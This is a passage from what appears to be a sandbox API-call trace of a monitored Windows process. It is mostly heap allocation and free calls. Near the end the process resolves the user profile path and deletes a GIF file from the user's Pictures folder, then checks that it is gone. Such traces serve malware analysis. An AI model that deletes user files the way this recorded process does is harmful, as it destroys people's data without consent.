(HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0254.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0254.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0254.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0254.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0254.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0254.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0254.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0254.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51538 [0254.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51490 [0254.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51448 [0254.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0254.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51550 [0254.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0254.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0254.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51400 [0254.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0254.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0254.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0254.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0254.500] CloseHandle (hObject=0x2a0) returned 1 [0254.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0254.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0254.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0254.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0254.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0254.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0254.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0254.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0254.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0254.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0254.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0254.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0254.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0254.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0254.504] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0254.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0254.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0254.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0254.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0254.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0254.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0254.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0254.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0254.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513d0 [0254.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514d8 [0254.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51328 [0254.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0254.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51358 [0254.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0254.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0254.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513e8 [0254.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0254.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0254.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0254.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0254.505] CloseHandle (hObject=0x2d0) returned 1 [0254.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0254.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0254.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0254.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0254.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0254.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0254.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0254.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0254.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0254.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0254.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0254.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0254.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0254.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0254.510] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0254.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0254.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0254.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0254.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0254.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0254.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0254.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0254.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0254.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0254.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0254.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0254.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0254.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0254.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0254.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0254.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0254.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ecb960 | out: hHeap=0x970000) returned 1 [0254.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0254.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0254.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0254.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0254.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0254.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0254.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0254.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0254.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0254.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0254.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0254.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0254.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0254.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0254.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0254.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0254.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0254.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0254.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0254.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0254.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0254.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0254.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0254.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0254.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0254.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0254.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0254.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0254.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0254.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0254.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0254.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0254.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0254.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0254.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0254.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0254.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0254.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0254.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0254.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0254.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0254.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0254.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0254.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0254.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0254.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0254.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0254.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0254.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0254.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0254.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0254.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0254.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0254.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0254.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0254.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0254.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0254.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0254.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0254.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0254.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0254.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0254.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0254.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0254.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0254.516] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0254.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0254.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0254.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0254.516] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0254.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0254.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0254.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0254.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0254.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0254.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0254.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0254.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0254.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0254.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0254.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0254.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0254.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0254.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0254.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0254.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0254.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0254.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0254.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x48) returned 0x2e58910 [0254.517] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/TbPkae.gif", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\TbPkae.gif", lpFilePart=0x8cedf4*="TbPkae.gif") returned 0x23 [0254.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0254.517] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\TbPkae.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\tbpkae.gif")) returned 0x20 [0254.531] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\TbPkae.gif", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4f56ed0, ftCreationTime.dwHighDateTime=0x1d5e570, ftLastAccessTime.dwLowDateTime=0xf735c220, ftLastAccessTime.dwHighDateTime=0x1d5eee3, ftLastWriteTime.dwLowDateTime=0xf735c220, ftLastWriteTime.dwHighDateTime=0x1d5eee3, nFileSizeHigh=0x0, nFileSizeLow=0x13182, dwReserved0=0x1, dwReserved1=0x1c, cFileName="TbPkae.gif", cAlternateFileName="")) returned 0xa874d0 [0254.532] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\TbPkae.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\tbpkae.gif")) returned 1 [0254.553] FindNextFileW (in: hFindFile=0xa874d0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4f56ed0, ftCreationTime.dwHighDateTime=0x1d5e570, ftLastAccessTime.dwLowDateTime=0xf735c220, ftLastAccessTime.dwHighDateTime=0x1d5eee3, ftLastWriteTime.dwLowDateTime=0xf735c220, ftLastWriteTime.dwHighDateTime=0x1d5eee3, nFileSizeHigh=0x0, nFileSizeLow=0x13182, dwReserved0=0x1, dwReserved1=0x1c, cFileName="TbPkae.gif", cAlternateFileName="")) returned 0 [0254.553] FindClose (in: hFindFile=0xa874d0 | out: hFindFile=0xa874d0) returned 1 [0254.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0254.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0254.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0254.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0254.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0254.554] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0254.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0254.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0254.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0254.554] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0254.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0254.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0254.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0254.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0254.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0254.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0254.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0254.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0254.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0254.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0254.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0254.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0254.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0254.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0254.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0254.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0254.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0254.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0254.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0254.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0254.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0254.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x48) returned 0x2e58910 [0254.555] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/TbPkae.gif", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\TbPkae.gif", lpFilePart=0x8cf650*="TbPkae.gif") returned 0x23 [0254.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0254.555] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\TbPkae.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\tbpkae.gif")) returned 0xffffffff [0254.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0254.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0254.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0254.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0254.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0254.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0254.555] PeekMessageW (in: lpMsg=0x8cf968, 